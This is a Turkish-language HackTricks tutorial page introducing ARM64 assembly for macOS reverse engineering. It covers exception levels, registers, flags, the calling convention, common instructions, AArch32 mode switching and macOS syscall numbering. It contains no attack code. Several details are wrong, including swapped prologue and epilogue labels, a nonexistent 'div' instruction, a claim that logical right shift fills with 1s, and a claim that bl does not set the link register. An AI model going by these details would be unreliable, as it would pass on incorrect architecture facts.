hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md

46 KiB
Raw Blame History

ARM64v8'ye Giriş

Sıfırdan Kahraman'a kadar AWS hackleme öğrenin htARTE (HackTricks AWS Red Team Expert) ile!

HackTricks'ı desteklemenin diğer yolları:

İstisna Seviyeleri - EL (ARM64v8)

ARMv8 mimarisinde, İstisna Seviyeleri (EL'ler) olarak bilinen yürütme seviyeleri, yürütme ortamının ayrıcalık seviyesini ve yeteneklerini tanımlar. EL0'dan EL3'e kadar dört istisna seviyesi bulunmaktadır, her biri farklı bir amaca hizmet eder:

  1. EL0 - Kullanıcı Modu:
  • Bu en az ayrıcalıklı seviyedir ve düzenli uygulama kodlarını yürütmek için kullanılır.
  • EL0'da çalışan uygulamalar birbirinden ve sistem yazılımından izole edilir, böylece güvenlik ve kararlılık artar.
  1. EL1 - İşletim Sistemi Çekirdek Modu:
  • Çoğu işletim sistemi çekirdeği bu seviyede çalışır.
  • EL1, EL0'dan daha fazla ayrıcalığa sahiptir ve sistem kaynaklarına erişebilir, ancak sistem bütünlüğünü sağlamak için bazı kısıtlamalar vardır.
  1. EL2 - Hipervizör Modu:
  • Bu seviye sanallaştırma için kullanılır. EL2'de çalışan bir hipervizör, aynı fiziksel donanım üzerinde çalışan birden fazla işletim sistemini (her biri kendi EL1'inde) yönetebilir.
  • EL2, sanallaştırılmış ortamların izolasyonu ve kontrolü için özellikler sağlar.
  1. EL3 - Güvenli Monitör Modu:
  • Bu en ayrıcalıklı seviyedir ve genellikle güvenli önyükleme ve güvenilir yürütme ortamları için kullanılır.
  • EL3, güvenli ve güvensiz durumlar arasındaki erişimleri yönetebilir ve kontrol edebilir (güvenli önyükleme, güvenilir işletim sistemi vb.).

Bu seviyelerin kullanımı, kullanıcı uygulamalarından en ayrıcalıklı sistem yazılımlarına kadar farklı sistem bileşenlerini yapılandırılmış ve güvenli bir şekilde yönetme olanağı sağlar. ARMv8'in ayrıcalık seviyelerine yaklaşımı, farklı sistem bileşenlerini etkili bir şekilde izole etmeye yardımcı olarak sistemin güvenliğini ve sağlamlığını artırır.

Registerlar (ARM64v8)

ARM64'ün 31 genel amaçlı registerı bulunmaktadır, x0 ile x30 arasında etiketlenmiştir. Her biri 64 bit (8 byte) bir değer saklayabilir. Yalnızca 32 bit değerler gerektiren işlemler için, aynı registerlar w0 ile w30 adları kullanılarak 32 bit modunda erişilebilir.

  1. x0 ile x7 - Genellikle geçici registerlar olarak ve alt programlara parametre geçirme amaçlı kullanılır.
  • x0 ayrıca bir fonksiyonun dönüş verisini taşır.
  1. x8 - Linux çekirdeğinde, x8 svc komutu için sistem çağrı numarası olarak kullanılır. macOS'ta ise x16 kullanılır!
  2. x9 ile x15 - Daha fazla geçici registerlar, genellikle yerel değişkenler için kullanılır.
  3. x16 ve x17 - İçsel-prosedürel Çağrı Registerları. Hemen değerler için geçici registerlar. Ayrıca dolaylı fonksiyon çağrıları ve PLT (Procedure Linkage Table) kısayolları için kullanılır.
  • x16, macOS'ta svc komutu için sistem çağrı numarası olarak kullanılır.
  1. x18 - Platform registerı. Genel amaçlı bir register olarak kullanılabilir, ancak bazı platformlarda bu register platforma özgü amaçlar için ayrılmıştır: Windows'ta mevcut iş parçacığı ortam bloğuna işaretçi veya linux çekirdeğinde mevcut yürütülen görev yapısına işaret etmek için.
  2. x19 ile x28 - Bu, çağrıyı yapanın değerlerini koruması gereken çağrılan registerlardır, bu nedenle bunların değerleri yığında saklanır ve çağrıya geri dönmeden önce geri alınır.
  3. x29 - Yığın çerçevesini takip etmek için çerçeve işaretçisi. Bir işlev çağrıldığında yeni bir yığın çerçevesi oluşturulduğunda, x29 registerı yığında saklanır ve yeni çerçeve işaretçi adresi (sp adresi) bu registerda saklanır.
  • Bu register genel amaçlı bir register olarak da kullanılabilir, ancak genellikle yerel değişkenlere referans olarak kullanılır.
  1. x30 veya lr- Bağlantı registerı. Bir BL (Bağlantılı Dal) veya BLR (Register ile Bağlantılı Dal) komutu yürütüldüğünde dönüş adresini tutar, bu da bu registerda pc değerini saklayarak gerçekleştirilir.
  • Diğer registerlar gibi kullanılabilir.
  • Eğer mevcut fonksiyon yeni bir fonksiyon çağıracak ve dolayısıyla lr'yi üzerine yazacaksa, bunu başlangıçta yığında saklar, bu epilog (stp x29, x30 , [sp, #-48]; mov x29, sp -> fp ve lr'yi sakla, alan oluştur ve yeni fp al) ve sonunda geri alır, bu prolog (ldp x29, x30, [sp], #48; ret -> fp ve lr'yi geri al ve dön).
  1. sp - Yığın işaretçisi, yığının en üstünü takip etmek için kullanılır.
  • sp değeri her zaman en az bir quadword hizalamasında tutulmalıdır, aksi takdirde bir hizalama istisnası oluşabilir.
  1. pc - Program sayacı, bir sonraki komuta işaret eder. Bu register yalnızca istisna oluşturma, istisna dönüşleri ve dallanmalar aracılığıyla güncellenebilir. Bu registerı okuyabilen tek sıradan komutlar, pc adresini lr'ye (Bağlantı Registerı) saklamak için bağlantılı dal komutlarıdır.
  2. xzr - Sıfır registerı. 32 bit register formunda wzr olarak da adlandırılır. Sıfır değerini kolayca almak için (yaygın işlem) veya subs kullanarak karşılaştırmalar yapmak için kullanılabilir, örneğin subs XZR, Xn, #10 sonuç verisini hiçbir yere saklamadan (xzr'ye) saklar.

Wn registerları, Xn registerının 32 bit versiyonudur.

SIMD ve Kayan Nokta Registerları

Ayrıca, optimize edilmiş tek komutla çoklu veri (SIMD) işlemleri ve kayan nokta aritmetiği yapmak için kullanılabilen başka 32 adet 128 bit uzunluğunda register bulunmaktadır. Bunlar Vn registerları olarak adlandırılır, ancak aynı zamanda 64-bit, 32-bit, 16-bit ve 8-bit olarak da çalışabilir ve o zaman Qn, Dn, Sn, Hn ve Bn olarak adlandırılırlar.

Sistem Kayıtları

Yüzlerce sistem kaydı veya özel amaçlı kayıtlar (SPR'ler) olarak adlandırılan sistem kayıtları, işlemcilerin davranışını izlemek ve kontrol etmek için kullanılır.
Bu kayıtlar yalnızca özel mrs ve msr komutlarını kullanarak okunabilir veya ayarlanabilir.

Özel kayıtlar TPIDR_EL0 ve TPIDDR_EL0 genellikle tersine mühendislik yapılırken bulunur. EL0 eki, kaydın hangi istisna seviyesinden erişilebileceğini gösterir (bu durumda EL0, normal programların çalıştığı istisna (ayrıcalık) seviyesidir).
Genellikle bunlar bellek bölgesinin iş parçacığı yerel depolama alanının taban adresini saklamak için kullanılır. Genellikle birincisi EL0'da çalışan programlar için okunabilir ve yazılabilir, ancak ikincisi EL0'dan okunabilir ve EL1'den (çekirdek gibi) yazılabilir.

  • mrs x0, TPIDR_EL0 ; TPIDR_EL0'i x0'a oku
  • msr TPIDR_EL0, X0 ; x0'u TPIDR_EL0'e yaz

PSTATE

PSTATE, işlemcinin SPSR_ELx özel kaydına seri hale getirilmiş birkaç işlem bileşenini içerir, X tetiklenen istisna seviyesinin izin düzeyini belirtir (bu, istisna sona erdiğinde işlem durumunu kurtarmayı sağlar).
Bu erişilebilir alanlar şunlardır:

  • N, Z, C ve V durum bayrakları:
  • N, işlemin negatif bir sonuç verdiğini belirtir
  • Z, işlemin sıfır verdiğini belirtir
  • C, işlemin taşındığını belirtir
  • V, işlemin işaretli bir taşma verdiğini belirtir:
  • İki pozitif sayının toplamı negatif bir sonuç verir.
  • İki negatif sayının toplamı pozitif bir sonuç verir.
  • Çıkarma işleminde, büyük bir negatif sayıdan daha küçük bir pozitif sayı çıkarıldığında (veya tersi durumda) ve sonuç verilen bit boyutu aralığında temsil edilemiyorsa.
  • ıkçası işlemcinin işlemin işaretli olup olmadığını bilmediği için, işlemlerde C ve V'yi kontrol edecek ve işaretli veya işaretsiz olup olmadığına göre bir taşıma olup olmadığını belirtecektir.

{% hint style="warning" %} Tüm komutlar bu bayrakları güncellemez. CMP veya TST gibi bazıları bunu yapar, ve ADDS gibi s takısına sahip olanlar da yapar. {% endhint %}

  • Geçerli kayıt genişliği (nRW) bayrağı: Bayrak değeri 0 ise, program tekrar devam ettiğinde AArch64 yürütme durumunda çalışacaktır.
  • Geçerli İstisna Seviyesi (EL): EL0'da çalışan normal bir programın değeri 0 olacaktır
  • Tek adımlama bayrağı (SS): Hata ayıklama araçları tarafından tek adımlamak için SS bayrağını SPSR_ELx içinde 1 olarak ayarlamak için kullanılır. Program bir adım çalışacak ve tek adım istisnası verecektir.
  • Yasadışı istisna durumu bayrağı (IL): Ayrıcalıklı bir yazılımın geçersiz bir istisna seviyesi transferi gerçekleştirdiğinde işaretlenir, bu bayrak 1 olarak ayarlanır ve işlemci yasadışı bir durum istisnası tetikler.
  • DAIF bayrakları: Bu bayraklar ayrıcalıklı bir programın belirli harici istisnaları seçmeli olarak maskelemesine izin verir.
  • A 1 ise asenkron hatalar tetikleneceği anlamına gelir. I harici donanım Kesme İsteklerine (IRQ'ler) yanıt vermek için yapılandırılır ve F Hızlı Kesme İstekleri (FIR'ler) ile ilgilidir.
  • Yığın işaretçisi seç bayrakları (SPS): EL1 ve üstünde çalışan ayrıcalıklı programlar, kendi yığın işaretçi kaydını ve kullanıcı modelini (örneğin SP_EL1 ve EL0 arasında) değiş tokuş yapabilir. Bu değişim, SPSel özel kaydına yazılarak gerçekleştirilir. Bu EL0'dan yapılamaz.

Çağrı Sözleşmesi (ARM64v8)

ARM64 çağrı sözleşmesi, bir işlev için ilk sekiz parametrenin x0 ile x7 kayıtlarında geçirildiğini belirtir. Ek parametreler yığın üzerinde geçirilir. Dönüş değeri, kayıt x0 içinde geri döndürülür, veya 128 bit uzunluğunda ise ayrıca x1 içinde de olabilir. x19 ile x30 ve sp kayıtları işlev çağrıları arasında korunmalıdır.

Bir işlevi derleyici dilinde okurken, işlev giriş ve çıkışını arayın. Giriş genellikle çerçeve işaretçisini (x29), yeni bir çerçeve işaretçisi ayarlama ve yığın alanı tahsis etme içerir. Çıkış genellikle kaydedilen çerçeve işaretçisini geri yükleme ve işlevden dönme içerir.

Swift'te Çağrı Sözleşmesi

Swift'in kendi çağrı sözleşmesi https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64 adresinde bulunabilir.

Ortak Komutlar (ARM64v8)

ARM64 komutları genellikle opcode hedef, kaynak1, kaynak2 formatına sahiptir, burada opcode yapılacak işlemi belirtir (add, sub, mov vb.), hedef sonucun depolanacağı hedef kayıt, ve kaynak1 ve kaynak2 kaynak kayıtlarıdır. Hemen kaynak kayıtlarının yerine anlık değerler de kullanılabilir.

  • mov: Bir değeri bir kaynaktan başka bir kayda taşı.
  • Örnek: mov x0, x1 — Bu, x1 den x0 a değeri taşır.
  • ldr: Bir değeri bellekten bir kayda yükle.
  • Örnek: ldr x0, [x1] — Bu, x1 tarafından işaret edilen bellek konumundan değeri x0 a yükler.
  • Ofset modu: Orin işaretçisini etkileyen bir ofset belirtilir, örneğin:
  • ldr x2, [x1, #8], bu x1 + 8'den x2'ye değeri yükler
  • ldr x2, [x0, x1, lsl #2], bu x0 dizisinden x1 (endeks) * 4 pozisyonundaki nesneyi x2'ye yükler
  • Ön-indeks modu: Bu, hesaplamaları orijine uygular, sonucu alır ve yeni orijini orijine kaydeder.
  • ldr x2, [x1, #8]!, bu x1 + 8 i x2'ye yükler ve x1 + 8 sonucunu x1'e kaydeder
  • str lr, [sp, #-4]!, Bağlantı kaydını sp'ye kaydeder ve sp kaydını günceller
  • Sonrası-indeks modu: Bu bir öncekine benzer ancak bellek adresine erişilir ve ardından ofset hesaplanır ve saklanır.
  • ldr x0, [x1], #8, x1'i x0'a yükler ve x1 + 8 ile x1'i günceller
  • PC'ye göre adresleme: Bu durumda yüklenecek adres, PC kaydına göre hesaplanır
  • ldr x1, =_start, Bu, _start sembolünün başladığı adresi, mevcut PC'ye göre x1'e yükler.
  • str: Bir değeri bir kaynaktan belleğe kaydet.
  • Örnek: str x0, [x1] — Bu, x0 daki değeri x1 tarafından işaret edilen bellek konumuna kaydeder.
  • ldp: Çift Kayıt Yükle. Bu komut, ardışık bellek konumlarından iki kaydı yükler. Bellek adresi genellikle başka bir kayırdaki değere bir ofset ekleyerek oluşturulur.
  • Örnek: ldp x0, x1, [x2] — Bu, sırasıyla x2 ve x2 + 8 konumlarındaki bellekten x0 ve x1'i yükler.
  • stp: Çift Kayıt Sakla. Bu komut, iki kaydı ardışık bellek konumlarına saklar. Bellek adresi genellikle başka bir kayırdaki değere bir ofset ekleyerek oluşturulur.
  • Örnek: stp x0, x1, [sp] — Bu, sırasıyla sp ve sp + 8 konumlarındaki belleğe x0 ve x1'i saklar.
  • stp x0, x1, [sp, #16]! — Bu, sırasıyla sp+16 ve sp + 24 konumlarındaki belleğe x0 ve x1'i saklar ve sp'yi sp+16 ile günceller.
  • add: İki kaydın değerlerini ekler ve sonucu bir kayda kaydeder.
  • Sözdizimi: add(s) Xn1, Xn2, Xn3 | #imm, [shift #N | RRX]
  • Xn1 -> Hedef
  • Xn2 -> Operand 1
  • Xn3 | #imm -> Operand 2 (register veya immediate)
  • [shift #N | RRX] -> Bir kaydırma yap veya RRX'i çağır
  • Örnek: add x0, x1, x2 — Bu, x1 ve x2 değerlerini toplar ve sonucu x0'a kaydeder.
  • add x5, x5, #1, lsl #12 — Bu, 4096'ya eşittir (1'i 12 kez kaydırma) -> 1 0000 0000 0000 0000
  • adds Bu, bir add işlemi gerçekleştirir ve bayrakları günceller
  • sub: İki kaydırıcının değerlerini çıkarır ve sonucu bir kaydırıcıda saklar.
  • add sözdizimini kontrol et.
  • Örnek: sub x0, x1, x2 — Bu, x1'deki değerden x2'yi çıkarır ve sonucu x0'a kaydeder.
  • subs Bu, sub işlemini yapar ve bayrakları günceller
  • mul: İki kaydırıcının değerlerini çarpar ve sonucu bir kaydırıcıda saklar.
  • Örnek: mul x0, x1, x2 — Bu, x1 ve x2 değerlerini çarpar ve sonucu x0'a kaydeder.
  • div: Bir kaydırıcının değerini başka bir kaydırıcıya böler ve sonucu bir kaydırıcıda saklar.
  • Örnek: div x0, x1, x2 — Bu, x1'deki değeri x2'ye böler ve sonucu x0'a kaydeder.
  • lsl, lsr, asr, ror, rrx:
  • Mantıksal sola kaydırma: Diğer bitleri ileriye taşıyarak sona 0'lar ekler (n kez 2 ile çarpar)
  • Mantıksal sağa kaydırma: Diğer bitleri geriye taşıyarak başa 1'ler ekler (işaretsiz bölmede n kez 2'ye böler)
  • Aritmetik sağa kaydırma: lsr gibi, ancak en anlamlı bit 1 ise, 1'ler eklenir (işaretli bölmede n kez 2'ye böler)
  • Sağa döndürme: lsr gibi, ancak sağdan kaldırılan her şey sola eklenir
  • Uzantı ile Sağa Döndürme: ror gibi, ancak taşıma bayrağı "en anlamlı bit" olarak kabul edilir. Bu nedenle, taşıma bayrağı 31. bit'e ve kaldırılan bit taşıma bayrağına taşınır.
  • bfm: Bit Alanı Taşıma, bu işlemler bir değerden belirli bitleri kopyalar ve bunları belirli pozisyonlara yerleştirir. #s en sol bit konumunu belirtir ve #r sağa döndürme miktarını belirtir.
  • Bit alanı taşıma: BFM Xd, Xn, #r
  • İşaretli Bit alanı taşıma: SBFM Xd, Xn, #r, #s
  • İşaretsiz Bit alanı taşıma: UBFM Xd, Xn, #r, #s
  • Bit Alanı Çıkartma ve Ekleme: Bir kaydırıcıdan bir bit alanını kopyalar ve başka bir kaydırıcıya kopyalar.
  • BFI X1, X2, #3, #4 X2'den X1'in 3. bitine 4 bit ekler
  • BFXIL X1, X2, #3, #4 X2'nin 3. bitinden başlayarak dört biti çıkarır ve bunları X1'e kopyalar
  • SBFIZ X1, X2, #3, #4 X2'den 4 biti işaretle genişletir ve X1'e 3. bit pozisyonundan başlayarak yerleştirir, sağdaki bitleri sıfırlar
  • SBFX X1, X2, #3, #4 X2'den 3. bit başlayarak 4 bit çıkarır, işaretle genişletir ve sonucu X1'e yerleştirir
  • UBFIZ X1, X2, #3, #4 X2'den 4 biti sıfırlar genişletir ve X1'e 3. bit pozisyonundan başlayarak yerleştirir, sağdaki bitleri sıfırlar
  • UBFX X1, X2, #3, #4 X2'den 3. bit başlayarak 4 bit çıkarır ve sıfırlanmış sonucu X1'e yerleştirir.
  • X'e İşareti Genişlet: Bir değerin işaretini genişletir (veya işaretsiz sürümde sadece 0'ları ekler) işlemler yapabilmek için:
  • SXTB X1, W2 Bir baytın işaretini genişletir W2'den X1'e (W2, X2'nin yarısıdır) 64 biti doldurmak için
  • SXTH X1, W2 16 bitlik bir sayının işaretini genişletir W2'den X1'e 64 biti doldurmak için
  • SXTW X1, W2 Bir baytın işaretini genişletir W2'den X1'e 64 biti doldurmak için
  • UXTB X1, W2 Bir bayta 0'lar ekler (işaretsiz) W2'den X1'e 64 biti doldurmak için
  • extr: Belirtilen çift kaydırıcıdan bitleri çıkarır ve birleştirir.
  • Örnek: EXTR W3, W2, W1, #3 Bu, W1+W2'yi birleştirir ve W2'nin 3. bitinden W1'in 3. bitine kadar olan kısmı alır ve W3'te saklar.
  • cmp: İki kaydırıcıyı karşılaştırır ve koşul bayraklarını ayarlar. subs'nin bir takma adı olup hedef kaydırıcıyı sıfır kaydırıcıya ayarlar. m == n ise bilmeniz için kullanışlıdır.
  • Aynı sözdizimini destekler
  • Örnek: cmp x0, x1 — Bu, x0 ve x1 değerlerini karşılaştırır ve koşul bayraklarını buna göre ayarlar.
  • cmn: Negatif karşılaştırma işlemi. Bu durumda, adds'nin bir takma adıdır ve aynı sözdizimini destekler. m == -n ise bilmeniz için kullanışlıdır.
  • ccmp: Koşullu karşılaştırma, önceki bir karşılaştırmanın doğru olması durumunda gerçekleştirilen ve özellikle nzcv bitlerini belirleyen bir karşılaştırmadır.
  • cmp x1, x2; ccmp x3, x4, 0, NE; blt _func -> x1 != x2 ve x3 < x4 ise _func'a atla
  • Bu, çünkü ccmp yalnızca önceki cmp bir NE ise gerçekleştirilecek, değilse nzcv bitleri 0 olarak ayarlanacaktır (blt karşılaştırmasını karşılamayacaktır).
  • Bu aynı zamanda ccmn olarak da kullanılabilir (aynı ancak negatif, cmp vs cmn gibi).
  • tst: Karşılaştırmanın değerlerinden herhangi ikisinin de 1 olup olmadığını kontrol eder (sonucu herhangi bir yere kaydetmeden ve işlem yapmadan çalışır). Bir kaydırıcıyı bir değerle kontrol etmek ve belirtilen değerde gösterilen kaydırıcının herhangi bir bitinin 1 olup olmadığını kontrol etmek için kullanışlıdır.
  • Örnek: tst X1, #7 X1'in son 3 bitinden herhangi birinin 1 olup olmadığını kontrol edin
  • teq: Sonucu atlayarak XOR işlemi yapar
  • b: Koşulsuz atama
  • Örnek: b myFunction
  • Bu, dönüş adresiyle bağlantı kaydırıcısını doldurmayacaktır (geri dönmesi gereken alt program çağrıları için uygun değildir)
  • bl: Bağlantı ile atama, bir alt programı çağırmak için kullanılır. Dönüş adresini x30'da saklar.
  • Örnek: bl myFunction — Bu, myFunction fonksiyonunu çağırır ve dönüş adresini x30'da saklar.
  • Bu, dönüş adresiyle bağlantı kaydırıcısını doldurmayacaktır (geri dönmesi gereken alt program çağrıları için uygun değildir)
  • blr: Kayıtlı bir hedefte belirtilen bir alt programı çağırmak için kullanılır. Dönüş adresini x30'da saklar. (Bu
  • Örnek: blr x1 — Bu, adresi x1 içinde bulunan fonksiyonu çağırır ve dönüş adresini x30'da saklar.
  • ret: Alt programdan dön, genellikle x30 adresini kullanarak.
  • Örnek: ret — Bu, mevcut alt programdan x30 adresindeki dönüş adresini kullanarak döner.
  • b.<cond>: Koşullu atamalar
  • b.eq: Eşitse atama, önceki cmp talimatına dayanır.
  • Örnek: b.eq label — Önceki cmp talimatında iki eşit değer bulunursa, bu label'a atlar.
  • b.ne: Eşit Değilse Dal. Bu talimat, koşul bayraklarını kontrol eder (önceki bir karşılaştırma talimatı tarafından ayarlanmıştır) ve karşılaştırılan değerler eşit değilse, bir etikete veya adrese dalış yapar.
  • Örnek: cmp x0, x1 talimatından sonra, b.ne labelx0 ve x1 içindeki değerler eşit değilse, bu label'e atlar.
  • cbz: Sıfıra Karşılaştır ve Dal. Bu talimat bir kaydı sıfır ile karşılaştırır ve eğer eşitlerse, bir etikete veya adrese dalış yapar.
  • Örnek: cbz x0, labelx0 içindeki değer sıfırsa, bu label'e atlar.
  • cbnz: Sıfıra Karşılaştırma ve Sıfır Olmayan Durumda Dal. Bu talimat bir kaydı sıfır ile karşılaştırır ve eğer eşit değillerse, bir etikete veya adrese dalış yapar.
  • Örnek: cbnz x0, labelx0 içindeki değer sıfır olmayan bir değerse, bu label'e atlar.
  • tbnz: Biti test et ve sıfır olmayan durumda dal
  • Örnek: tbnz x0, #8, label
  • tbz: Biti test et ve sıfır durumunda dal
  • Örnek: tbz x0, #8, label
  • Koşullu seçim işlemleri: Davranışı koşullu bitlere bağlı olan işlemlerdir.
  • csel Xd, Xn, Xm, cond -> csel X0, X1, X2, EQ -> Doğruysa, X0 = X1, yanlışsa, X0 = X2
  • csinc Xd, Xn, Xm, cond -> Doğruysa, Xd = Xn, yanlışsa, Xd = Xm + 1
  • cinc Xd, Xn, cond -> Doğruysa, Xd = Xn + 1, yanlışsa, Xd = Xn
  • csinv Xd, Xn, Xm, cond -> Doğruysa, Xd = Xn, yanlışsa, Xd = DEĞİL(Xm)
  • cinv Xd, Xn, cond -> Doğruysa, Xd = DEĞİL(Xn), yanlışsa, Xd = Xn
  • csneg Xd, Xn, Xm, cond -> Doğruysa, Xd = Xn, yanlışsa, Xd = - Xm
  • cneg Xd, Xn, cond -> Doğruysa, Xd = - Xn, yanlışsa, Xd = Xn
  • cset Xd, Xn, Xm, cond -> Doğruysa, Xd = 1, yanlışsa, Xd = 0
  • csetm Xd, Xn, Xm, cond -> Doğruysa, Xd = <tüm 1>, yanlışsa, Xd = 0
  • adrp: Bir sembolün sayfa adresini hesapla ve bir kayıtta sakla.
  • Örnek: adrp x0, symbol — Bu, symbol'ün sayfa adresini hesaplar ve x0'a saklar.
  • ldrsw: Bellekten işaretle 32 bitlik bir değeri 64 bite genişleterek yükle.
  • Örnek: ldrsw x0, [x1] — Bu, x1 tarafından işaret edilen bellek konumundan işaretle 32 bitlik bir değeri yükler, 64 bit'e genişletir ve x0'a saklar.
  • stur: Bir kaydın değerini başka bir kayırdan gelen bir ofset kullanarak bir bellek konumuna sakla.
  • Örnek: stur x0, [x1, #4] — Bu, x1 içindeki adresin 4 bayt daha büyük olan bellek adresine x0 içindeki değeri saklar.
  • svc : Bir sistem çağrısı yap. "Supervisor Call" kısaltmasıdır. İşlemci bu talimatı çalıştırdığında, kullanıcı modundan çekirdek moduna geçer ve çekirdeğin sistem çağrısı işleme kodunun bulunduğu belirli bir bellek konumuna atlar.
  • Örnek:
mov x8, 93  ; Çıkış için sistem çağrısı numarasını (93) x8 kaydına yükle.
mov x0, 0   ; Çıkış durum kodunu (0) x0 kaydına yükle.
svc 0       ; Sistem çağrısı yap.

Fonksiyon Prologu

  1. Bağlantı kaydedici ve çerçeve işaretçisini yığına kaydet:

{% code overflow="wrap" %}

stp x29, x30, [sp, #-16]!  ; store pair x29 and x30 to the stack and decrement the stack pointer

{% endcode %}

  1. Yeni çerçeve işaretçisini ayarlayın: mov x29, sp (geçerli işlev için yeni çerçeve işaretçisini ayarlar)
  2. Yerel değişkenler için yığın üzerinde alan ayırın (gerekiyorsa): sub sp, sp, <boyut> (burada <boyut>, ihtiyaç duyulan bayt sayısıdır)

İşlev Epilogu

  1. Yerel değişkenleri serbest bırakın (varsa): add sp, sp, <boyut>
  2. Bağlantı kaydedicisini ve çerçeve işaretçisini geri yükleyin:

{% code overflow="wrap" %}

ldp x29, x30, [sp], #16  ; load pair x29 and x30 from the stack and increment the stack pointer

{% endcode %}

  1. Dönüş: ret (kontrolü çağırana link kaydedicideki adrese döndürür)

AARCH32 Yürütme Durumu

Armv8-A, 32 bitlik programların yürütülmesini destekler. AArch32, iki komut setinden birinde çalışabilir: A32 ve T32 ve aralarında geçiş yapabilir.
Ayrıcalıklı 64 bitlik programlar, daha düşük ayrıcalıklı 32 bitlik programa bir istisna seviye transferi gerçekleştirerek 32 bitlik programların yürütülmesini planlayabilir.
64 bitlikten 32 bitliğe geçişin, istisna seviyesinin düşürülmesiyle gerçekleştiğini unutmayın (örneğin, EL1'de 64 bitlik bir program EL0'da bir programı tetikler). Bu, AArch32 işlem ipliğinin yürütülmeye hazır olduğunda SPSR_ELx özel kaydedicisinin 4. bitini 1 olarak ayarlayarak yapılır ve SPSR_ELx'in geri kalanı AArch32 programlarının CPSR'ini saklar. Ardından, ayrıcalıklı işlem ERET komutunu çağırarak işlemcinin AArch32'ye geçiş yapmasını sağlar ve CPSR'ye bağlı olarak A32 veya T32'ye girer.

Geçiş, CPSR'nin J ve T bitleri kullanılarak gerçekleşir. J=0 ve T=0 A32 anlamına gelir ve J=0 ve T=1 T32 anlamına gelir. Bu temelde, komut setinin T32 olduğunu belirtmek için en düşük bitin 1 olarak ayarlanması anlamına gelir.
Bu, geçiş dalı komutları sırasında ayarlanır, ancak PC hedef kaydedici olarak ayarlandığında diğer komutlarla da doğrudan ayarlanabilir. Örnek:

Başka bir örnek:

_start:
.code 32                ; Begin using A32
add r4, pc, #1      ; Here PC is already pointing to "mov r0, #0"
bx r4               ; Swap to T32 mode: Jump to "mov r0, #0" + 1 (so T32)

.code 16:
mov r0, #0
mov r0, #8

Kayıtlar

16 adet 32 bitlik kayıt bulunmaktadır (r0-r15). r0'dan r14'e kadar olanlar herhangi bir işlem için kullanılabilir, ancak bazıları genellikle ayrılmıştır:

  • r15: Program sayacı (her zaman). Bir sonraki komutun adresini içerir. A32'de mevcut + 8, T32'de ise mevcut + 4.
  • r11: Çerçeve İşaretçisi
  • r12: İç işlevsel çağrı kaydı
  • r13: Yığın İşaretçisi
  • r14: Bağlantı Kaydı

Ayrıca, kayıtlar banked registries'de yedeklenir. Bu, istisna işleme ve ayrıcalıklı işlemlerde hızlı bağlam değiştirme yapılmasını sağlayan kayıt değerlerini depolayan yerlerdir, böylece her seferinde kayıtları manuel olarak kaydetme ve geri yükleme ihtiyacını ortadan kaldırır.
Bu, işlemcinin durumunu CPSR'den SPSR'ye aldığı işlem yapılan işlemci moduna kaydedilir. İstisna dönüşlerinde, CPSR SPSR'den geri yüklenir.

CPSR - Geçerli Program Durumu Kaydedici

AArch32'de CPSR, AArch64'teki PSTATE ile benzer şekilde çalışır ve bir istisna alındığında daha sonra yürütme yeniden başlatılmak üzere SPSR_ELx'de saklanır:

Alanlar bazı gruplara ayrılmıştır:

  • Uygulama Program Durumu Kaydedici (APSR): Aritmetik bayraklar ve EL0'dan erişilebilir
  • Yürütme Durumu Kaydedicileri: İşletim sistemi tarafından yönetilen işlem davranışı.

Uygulama Program Durumu Kaydedici (APSR)

  • N, Z, C, V bayrakları (AArch64'te olduğu gibi)
  • Q bayrağı: Özel doyurucu aritmetik komutun yürütülmesi sırasında tamsayı doygunluğu oluştuğunda 1 olarak ayarlanır. Bir kez 1 olarak ayarlandığında, elle 0 olarak ayarlanana kadar değeri korur. Ayrıca, değerini örtük olarak kontrol eden herhangi bir komut yoktur, değeri manuel olarak okunarak kontrol edilmelidir.
  • GE (Büyük veya eşit) Bayraklar: SIMD (Tek Komutla, Çoklu Veri) işlemlerinde kullanılır, örneğin "paralel toplama" ve "paralel çıkarma". Bu işlemler tek bir komutta birden fazla veri noktasını işlemeyi sağlar.

Örneğin, UADD8 komutu, paralel olarak dört çift baytı (iki 32 bitlik işleçten) ekler ve sonuçları bir 32 bitlik kayıtta saklar. Ardından, bu sonuçlara dayanarak APSR'deki GE bayraklarını ayarlar. Her GE bayrağı, bayt çiftlerinden biri için eklemenin taştığını gösterir.

SEL komutu, bu GE bayraklarını koşullu işlemler yapmak için kullanır.

Yürütme Durumu Kaydedicileri

  • J ve T bitleri: J 0 olmalı ve T 0 ise A32 komut seti kullanılır, 1 ise T32 kullanılır.
  • IT Blok Durum Kaydedici (ITSTATE): Bunlar 10-15 ve 25-26'dan gelen bitlerdir. Bir IT ön ekli grup içindeki komutlar için koşulları saklarlar.
  • E biti: endianness'ı belirtir.
  • Mod ve İstisna Maske Bitleri (0-4): Mevcut yürütme durumunu belirler. 5. olan programın 32 bitlik (1) veya 64 bitlik (0) olarak çalıştığını belirtir. Diğer 4'ü, kullanılan mevcut özel işlem modunu belirtir (bir istisna oluştuğunda ve işlendiğinde). Sayı, bu işlenirken başka bir istisna tetiklenirse mevcut önceliği belirtir.
  • AIF: Belirli istisnalar, A, I, F bitleri kullanılarak devre dışı bırakılabilir. A 1 ise asenkron hatalar tetikleneceği anlamına gelir. I, harici donanım Kesme İstekleri'ne (IRQ'ler) yanıt vermek için yapılandırılır ve F, Hızlı Kesme İstekleri'ne (FIR'ler) ilişkilidir.

macOS

BSD sistem çağrıları

syscalls.master'a göz atın. BSD sistem çağrılarının x16 > 0 olacaktır.

Mach Tuzakları

syscall_sw.c'de mach_trap_table'ı ve mach_traps.h'de prototipleri kontrol edin. Mach tuzaklarının sayısı MACH_TRAP_TABLE_COUNT = 128'dir. Mach tuzakları x16 < 0 olacaktır, bu nedenle önceki listedeki numaraları eksi işareti ile çağırmalısınız: _kernelrpc_mach_vm_allocate_trap -10'dur.

Bu (ve BSD) sistem çağrılarını nasıl çağıracağınızı bulmak için bir ayıklama aracında libsystem_kernel.dylib'i kontrol edebilirsiniz:

{% code overflow="wrap" %}

# macOS
dyldex -e libsystem_kernel.dylib /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e

# iOS
dyldex -e libsystem_kernel.dylib /System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64

{% endcode %}

